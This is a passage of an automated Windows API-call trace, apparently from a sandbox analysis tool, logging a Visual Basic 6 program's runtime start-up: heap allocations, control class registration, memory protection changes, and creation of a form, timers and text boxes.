[0135.678] lstrlenA (lpString="VB") returned 2 [0135.679] lstrlenA (lpString="ComboBox") returned 8 [0135.679] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xc) returned 0x10e1be8 [0135.679] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x108) returned 0x10e57f8 [0135.679] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x4c) returned 0x10d5d40 [0135.679] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x230) returned 0x10e5908 [0135.679] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e26b8 [0135.679] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e3938 [0135.679] lstrlenA (lpString="VB") returned 2 [0135.679] lstrlenA (lpString="ListBox") returned 7 [0135.680] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xb) returned 0x10e1c00 [0135.680] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x108) returned 0x10e5b40 [0135.680] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x54) returned 0x10e5c50 [0135.680] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x230) returned 0x10e5cb0 [0135.680] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e26d8 [0135.680] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e3a60 [0135.680] lstrlenA (lpString="VB") returned 2 [0135.680] lstrlenA (lpString="HScrollBar") returned 10 [0135.680] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xe) returned 0x10e1c18 [0135.680] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x24) returned 0x10e5ee8 [0135.681] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x90) returned 0x10e5f18 [0135.681] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x28) returned 0x10e5fb0 [0135.681] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x144) returned 0x10e5fe8 [0135.681] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e26f8 [0135.681] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e3b88 [0135.681] lstrlenA (lpString="VB") returned 2 [0135.681] lstrlenA (lpString="VScrollBar") returned 10 [0135.681] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xe) returned 0x10e1c30 [0135.681] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x24) returned 0x10e6138 [0135.681] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x90) returned 0x10e6168 [0135.682] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x28) returned 0x10e6200 [0135.682] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x144) returned 0x10e6230 [0135.682] RtlReAllocateHeap (Heap=0x10d0000, Flags=0x0, Ptr=0x10e32d8, Size=0xc8) returned 0x10e6380 [0135.682] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2718 [0135.682] RtlReAllocateHeap (Heap=0x10d0000, Flags=0x0, Ptr=0x10e3380, Size=0xc8) returned 0x10e6450 [0135.682] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e3cb0 [0135.682] lstrlenA (lpString="VB") returned 2 [0135.682] lstrlenA (lpString="DriveListBox") returned 12 [0135.682] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10e1c48 [0135.682] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x28) returned 0x10e32d8 [0135.683] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xc0) returned 0x10e3308 [0135.683] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x40) returned 0x10e33d0 [0135.683] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x1a0) returned 0x10e6520 [0135.683] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2738 [0135.683] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e3dd8 [0135.683] lstrlenA (lpString="VB") returned 2 [0135.683] lstrlenA (lpString="DirListBox") returned 10 [0135.683] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xe) returned 0x10e1c60 [0135.684] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x28) returned 0x10e66c8 [0135.684] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xc8) returned 0x10e66f8 [0135.684] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x50) returned 0x10e67c8 [0135.684] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x1b0) returned 0x10e6820 [0135.684] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2758 [0135.684] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e3f00 [0135.684] lstrlenA (lpString="VB") returned 2 [0135.684] lstrlenA (lpString="FileListBox") returned 11 [0135.684] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xf) returned 0x10e1c78 [0135.684] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x28) returned 0x10e69d8 [0135.685] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xec) returned 0x10e6a08 [0135.685] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x58) returned 0x10e6b00 [0135.685] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x1f8) returned 0x10e6b60 [0135.685] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2778 [0135.685] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e4028 [0135.685] lstrlenA (lpString="VB") returned 2 [0135.685] lstrlenA (lpString="Menu") returned 4 [0135.685] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x8) returned 0x10e3418 [0135.685] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x38) returned 0x10e6d60 [0135.685] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x4) returned 0x10d5d98 [0135.686] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xb8) returned 0x10e6da0 [0135.686] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2798 [0135.686] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e4150 [0135.686] lstrlenA (lpString="VB") returned 2 [0135.686] lstrlenA (lpString="Shape") returned 5 [0135.686] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x9) returned 0x10e1c90 [0135.686] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x1c) returned 0x10e6e60 [0135.686] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x68) returned 0x10e6e88 [0135.686] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xfc) returned 0x10e6ef8 [0135.687] RtlReAllocateHeap (Heap=0x10d0000, Flags=0x0, Ptr=0x10e6380, Size=0xf0) returned 0x10e7000 [0135.687] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e27b8 [0135.687] RtlReAllocateHeap (Heap=0x10d0000, Flags=0x0, Ptr=0x10e6450, Size=0xf0) returned 0x10e70f8 [0135.687] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e4278 [0135.687] lstrlenA (lpString="VB") returned 2 [0135.687] lstrlenA (lpString="Line") returned 4 [0135.687] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x8) returned 0x10d5da8 [0135.687] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x18) returned 0x10e27d8 [0135.687] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x50) returned 0x10e6380 [0135.687] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xd0) returned 0x10e63d8 [0135.688] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e27f8 [0135.688] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e43a0 [0135.688] lstrlenA (lpString="VB") returned 2 [0135.688] lstrlenA (lpString="Image") returned 5 [0135.688] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x9) returned 0x10e1ca8 [0135.688] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x24) returned 0x10e64b0 [0135.688] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x98) returned 0x10e71f0 [0135.688] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x34) returned 0x10e64e0 [0135.688] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x154) returned 0x10e7290 [0135.689] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2818 [0135.795] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e44c8 [0135.796] lstrlenA (lpString="VB") returned 2 [0135.796] lstrlenA (lpString="Data") returned 4 [0135.796] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x8) returned 0x10e73f0 [0135.796] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xd8) returned 0x10e7400 [0135.796] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x3c) returned 0x10e74e0 [0135.796] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x1d8) returned 0x10e7528 [0135.796] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2838 [0135.797] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x114) returned 0x10e45f0 [0135.797] lstrlenA (lpString="VB") returned 2 [0135.797] lstrlenA (lpString="OLE") returned 3 [0135.797] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x7) returned 0x10e7708 [0135.797] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x17c) returned 0x10e7718 [0135.797] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x40) returned 0x10e78a0 [0135.798] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x2f0) returned 0x10e78e8 [0135.799] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2858 [0135.799] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x114c610 [0135.800] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x114f060 [0135.800] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x114e758 [0135.800] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x114ef50 [0135.800] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x1158d18 [0135.800] IMalloc:Alloc (This=0x76da66bc, cb=0xc) returned 0x114ebd0 [0135.800] IMalloc:Alloc (This=0x76da66bc, cb=0x7c) returned 0x1158d88 [0135.800] IMalloc:GetSize (This=0x76da66bc, pv=0x1158d88) returned 0x7c [0135.800] IMalloc:Alloc (This=0x76da66bc, cb=0x20) returned 0x11592c0 [0135.800] GetCurrentThreadId () returned 0xfd8 [0135.801] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x54) returned 0x10e7be0 [0135.801] GetCurrentThreadId () returned 0xfd8 [0135.801] IMalloc:Alloc (This=0x76da66bc, cb=0x1c) returned 0x11592e8 [0135.801] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x104) returned 0x10e7c40 [0135.801] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x6f8) returned 0x10e7d50 [0135.802] VirtualProtect (in: lpAddress=0x3a0000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x28fd88 | out: lpflOldProtect=0x28fd88*=0x20) returned 1 [0135.802] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x3a0000, dwSize=0x6000) returned 1 [0135.802] VirtualAlloc (lpAddress=0x3a0000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0135.803] VirtualAlloc (lpAddress=0x3a0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0135.803] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xd4) returned 0x10e8450 [0135.803] VirtualAlloc (lpAddress=0x3a0000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0135.803] VirtualAlloc (lpAddress=0x3a0000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0135.804] VirtualProtect (in: lpAddress=0x3a0000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x28fd88 | out: lpflOldProtect=0x28fd88*=0x4) returned 1 [0135.804] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x3a0000, dwSize=0xa000) returned 1 [0135.804] GetCurrentThreadId () returned 0xfd8 [0135.805] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x23ec) returned 0x10e8530 [0135.823] SetWindowTextA (hWnd=0x60066, lpString="Using Shell32.dll") returned 1 [0135.823] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0xc, wParam=0x0, lParam=0x28fcfc) returned 0x1 [0135.823] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x28fce4 | out: phkResult=0x28fce4*=0x0) returned 0x2 [0135.824] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0135.824] VirtualQuery (in: lpAddress=0x28f710, lpBuffer=0x28f6f4, dwLength=0x1c | out: lpBuffer=0x28f6f4*(BaseAddress=0x28f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.824] IMalloc:Alloc (This=0x76da66bc, cb=0x6c) returned 0x11513d8 [0135.824] IMalloc:GetSize (This=0x76da66bc, pv=0x11513d8) returned 0x6c [0135.825] GetCurrentThreadId () returned 0xfd8 [0135.825] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x104) returned 0x10ea928 [0135.825] GetCurrentThreadId () returned 0xfd8 [0135.825] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x178) returned 0x10eaa38 [0135.826] GetCurrentThreadId () returned 0xfd8 [0135.826] GetCurrentThreadId () returned 0xfd8 [0135.827] GetCurrentThreadId () returned 0xfd8 [0135.827] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x140) returned 0x10eabb8 [0135.827] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x10) returned 0x10e1cc0 [0135.827] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x434) returned 0x10ead00 [0135.827] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x138 [0135.828] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x198) returned 0x10eb140 [0135.828] GetVersionExA (in: lpVersionInformation=0x28fa0c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x10e13c4, dwMinorVersion=0x28f95c, dwBuildNumber=0x28fc00, dwPlatformId=0x28ff00, szCSDVersion="Í\x1e­wÌ\x95Î\x01þÿÿÿ£<©wÎ<©w\x98\x01") | out: lpVersionInformation=0x28fa0c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0135.828] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0135.828] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2878 [0135.828] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x14) returned 0x10e2898 [0135.828] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x80) returned 0x10eb2e0 [0135.828] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10eb2e0 | out: hHeap=0x10d0000) returned 1 [0135.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MS Sans Serif", cbMultiByte=-1, lpWideCharStr=0x28fa34, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0135.828] OleCreateFontIndirect () returned 0x0 [0135.830] LoadIconA (hInstance=0x72940000, lpIconName=0x4b1) returned 0xa00d9 [0135.831] OleCreatePictureIndirect () returned 0x0 [0135.831] lstrlenA (lpString="Form1") returned 5 [0135.831] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10eb2e0 [0135.831] lstrlenA (lpString="ThunderRT6") returned 10 [0135.831] lstrcpyA (in: lpString1=0x28fa48, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.831] lstrlenA (lpString="ThunderRT6Form") returned 14 [0135.831] lstrcpynA (in: lpString1=0x28fa56, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0135.832] lstrlenA (lpString="ThunderRT6") returned 10 [0135.832] lstrcpyA (in: lpString1=0x28f9dc, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.832] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x28fa08 | out: lpWndClass=0x28fa08) returned 0 [0135.832] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0135.832] RegisterClassA (lpWndClass=0x28fa08) returned 0x57c1c7 [0135.832] lstrlenA (lpString="ThunderRT6") returned 10 [0135.832] lstrcpyA (in: lpString1=0x28f9dc, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.832] lstrlenA (lpString="ThunderRT6Form") returned 14 [0135.832] lstrcpynA (in: lpString1=0x28f9ea, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0135.832] RegisterClassA (lpWndClass=0x28fa08) returned 0x6ec1c9 [0135.832] AdjustWindowRectEx (in: lpRect=0x28fb08, dwStyle=0x2c80000, bMenu=0, dwExStyle=0x40000 | out: lpRect=0x28fb08) returned 1 [0135.832] CreateWindowExA (dwExStyle=0x40000, lpClassName=0xc1c9, lpWindowName=0x0, dwStyle=0x2c80000, X=-2147483648, Y=-2147483648, nWidth=347, nHeight=292, hWndParent=0x60066, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x103b8 [0135.833] NtdllDefWindowProc_A (hWnd=0x103b8, Msg=0x81, wParam=0x0, lParam=0x28f62c) returned 0x1 [0135.833] NtdllDefWindowProc_A (hWnd=0x103b8, Msg=0x83, wParam=0x0, lParam=0x28f618) returned 0x0 [0135.834] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="dwmapi.dll", cbMultiByte=10, lpWideCharStr=0x28e0a0, cchWideChar=2047 | out: lpWideCharStr="dwmapi.dll瞨((((ᝌ)") returned 10 [0135.834] SysReAllocStringLen (in: pbstr=0x28f0a4*=0x0, psz="dwmapi.dll", len=0xa | out: pbstr=0x28f0a4*="dwmapi.dll") returned 1 [0135.835] CharLowerBuffW (in: lpsz="dwmapi.dll", cchLength=0xa | out: lpsz="dwmapi.dll") returned 0xa [0135.835] LoadLibraryExA (lpLibFileName="dwmapi.dll", hFile=0x0, dwFlags=0x0) returned 0x74490000 [0135.928] GetLastError () returned 0x0 [0135.928] SetLastError (dwErrCode=0x0) [0135.928] GetProcAddress (hModule=0x74490000, lpProcName="DwmIsCompositionEnabled") returned 0x74491610 [0135.929] GetSystemMenu (hWnd=0x103b8, bRevert=0) returned 0x403b5 [0135.931] SetWindowContextHelpId (param_1=0x103b8, param_2=0xffffffff) returned 1 [0135.931] NtdllDefWindowProc_A (hWnd=0x103b8, Msg=0x1, wParam=0x0, lParam=0x28f62c) returned 0x0 [0135.931] GetWindowRect (in: hWnd=0x103b8, lpRect=0x28facc | out: lpRect=0x28facc) returned 1 [0135.931] GetDC (hWnd=0x103b8) returned 0x110106a0 [0135.931] GetTextMetricsA (in: hdc=0x110106a0, lptm=0x28f9f4 | out: lptm=0x28f9f4) returned 1 [0135.931] SetBkMode (hdc=0x110106a0, mode=1) returned 2 [0135.932] OleTranslateColor () returned 0x0 [0135.932] SetBkColor (hdc=0x110106a0, color=0xf0f0f0) returned 0xffffff [0135.932] OleTranslateColor () returned 0x0 [0135.932] SetTextColor (hdc=0x110106a0, color=0x0) returned 0x0 [0135.932] OleTranslateColor () returned 0x0 [0135.932] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0x6300bf9 [0135.932] SelectObject (hdc=0x110106a0, h=0x6300bf9) returned 0x1b00017 [0135.932] SelectObject (hdc=0x110106a0, h=0x1900011) returned 0x1900010 [0135.932] ClientToScreen (in: hWnd=0x103b8, lpPoint=0x28f9d4 | out: lpPoint=0x28f9d4) returned 1 [0135.932] SetBrushOrgEx (in: hdc=0x110106a0, x=3, y=1, lppt=0x0 | out: lppt=0x0) returned 1 [0135.932] UnrealizeObject (h=0x1900015) returned 1 [0135.932] SelectObject (hdc=0x110106a0, h=0x1900015) returned 0x1900011 [0135.933] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x14) returned 0x10e28b8 [0135.933] SelectObject (hdc=0x110106a0, h=0x860a07c4) returned 0x18a002e [0135.933] GetTextMetricsA (in: hdc=0x110106a0, lptm=0x28f7e8 | out: lptm=0x28f7e8) returned 1 [0135.934] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xdc) returned 0x10eb2f0 [0135.934] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e28d8 [0135.934] lstrlenA (lpString="ThunderRT6") returned 10 [0135.934] lstrcpyA (in: lpString1=0x28fa18, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.934] lstrlenA (lpString="ThunderRT6") returned 10 [0135.934] lstrcpyA (in: lpString1=0x28f9ac, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.934] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Timer", lpWndClass=0x28f9d8 | out: lpWndClass=0x28f9d8) returned 0 [0135.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0135.935] RegisterClassA (lpWndClass=0x28f9d8) returned 0x75c1c8 [0135.935] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1c8, lpWindowName=0x0, dwStyle=0x44010000, X=80, Y=24, nWidth=0, nHeight=0, hWndParent=0x103b8, hMenu=0x1, hInstance=0x72940000, lpParam=0x0) returned 0x103ba [0135.935] SetTimer (hWnd=0x103ba, nIDEvent=0x103ba, uElapse=0x7530, lpTimerFunc=0x0) returned 0x103ba [0135.935] NtdllDefWindowProc_A (hWnd=0x103ba, Msg=0x81, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.935] NtdllDefWindowProc_A (hWnd=0x103ba, Msg=0x83, wParam=0x0, lParam=0x28f5e8) returned 0x0 [0135.936] NtdllDefWindowProc_A (hWnd=0x103ba, Msg=0x1, wParam=0x0, lParam=0x28f5fc) returned 0x0 [0135.936] NtdllDefWindowProc_A (hWnd=0x103ba, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0135.936] NtdllDefWindowProc_A (hWnd=0x103ba, Msg=0x3, wParam=0x0, lParam=0x180050) returned 0x0 [0135.936] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xdc) returned 0x10eb3d8 [0135.936] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e28f8 [0135.937] lstrlenA (lpString="ThunderRT6") returned 10 [0135.937] lstrcpyA (in: lpString1=0x28fa18, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.937] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1c8, lpWindowName=0x0, dwStyle=0x44010000, X=48, Y=24, nWidth=0, nHeight=0, hWndParent=0x103b8, hMenu=0x2, hInstance=0x72940000, lpParam=0x0) returned 0x103bc [0135.937] SetTimer (hWnd=0x103bc, nIDEvent=0x103bc, uElapse=0x64, lpTimerFunc=0x0) returned 0x103bc [0135.937] NtdllDefWindowProc_A (hWnd=0x103bc, Msg=0x81, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.937] NtdllDefWindowProc_A (hWnd=0x103bc, Msg=0x83, wParam=0x0, lParam=0x28f5e8) returned 0x0 [0135.938] NtdllDefWindowProc_A (hWnd=0x103bc, Msg=0x1, wParam=0x0, lParam=0x28f5fc) returned 0x0 [0135.938] NtdllDefWindowProc_A (hWnd=0x103bc, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0135.938] NtdllDefWindowProc_A (hWnd=0x103bc, Msg=0x3, wParam=0x0, lParam=0x180030) returned 0x0 [0135.938] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xf4) returned 0x10eb4c0 [0135.940] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2918 [0135.940] lstrlenA (lpString="Text4") returned 5 [0135.940] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10eb5c0 [0135.941] lstrlenA (lpString="ThunderRT6") returned 10 [0135.941] lstrcpyA (in: lpString1=0x28fa18, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.941] lstrlenA (lpString="ThunderRT6") returned 10 [0135.941] lstrcpyA (in: lpString1=0x28f9ac, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.941] GetClassInfoA (in: hInstance=0x0, lpClassName="Edit", lpWndClass=0x28f9d8 | out: lpWndClass=0x28f9d8) returned 1 [0135.941] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6TextBox", lpWndClass=0x28f9d8 | out: lpWndClass=0x28f9d8) returned 0 [0135.941] RegisterClassA (lpWndClass=0x28f9d8) returned 0x6ec1d6 [0135.942] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1d6, lpWindowName="Text4", dwStyle=0x440100e0, X=160, Y=0, nWidth=33, nHeight=19, hWndParent=0x103b8, hMenu=0x3, hInstance=0x72940000, lpParam=0x0) returned 0x103be [0135.942] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103be, Msg=0x81, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.944] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103be, Msg=0x83, wParam=0x0, lParam=0x28f5e8) returned 0x0 [0135.944] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103be, Msg=0x1, wParam=0x0, lParam=0x28f5fc) returned 0x1 [0135.945] IsWindow (hWnd=0x103be) returned 1 [0135.945] IsWindow (hWnd=0x103be) returned 1 [0135.946] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103be, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0135.947] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103be, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0135.947] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103be, Msg=0x3, wParam=0x0, lParam=0x200a2) returned 0x0 [0135.947] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x14) returned 0x10e2938 [0135.948] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103be, Msg=0x30, wParam=0x860a07c4, lParam=0x0) returned 0x1 [0135.948] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103be, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0135.948] ShowWindow (hWnd=0x103be, nCmdShow=5) returned 0 [0135.948] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103be, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0135.948] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xf4) returned 0x10eb5d0 [0135.949] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x15) returned 0x10e2958 [0135.949] lstrlenA (lpString="Text3") returned 5 [0135.949] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10eb6d0 [0135.949] lstrlenA (lpString="ThunderRT6") returned 10 [0135.949] lstrcpyA (in: lpString1=0x28fa18, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0135.949] 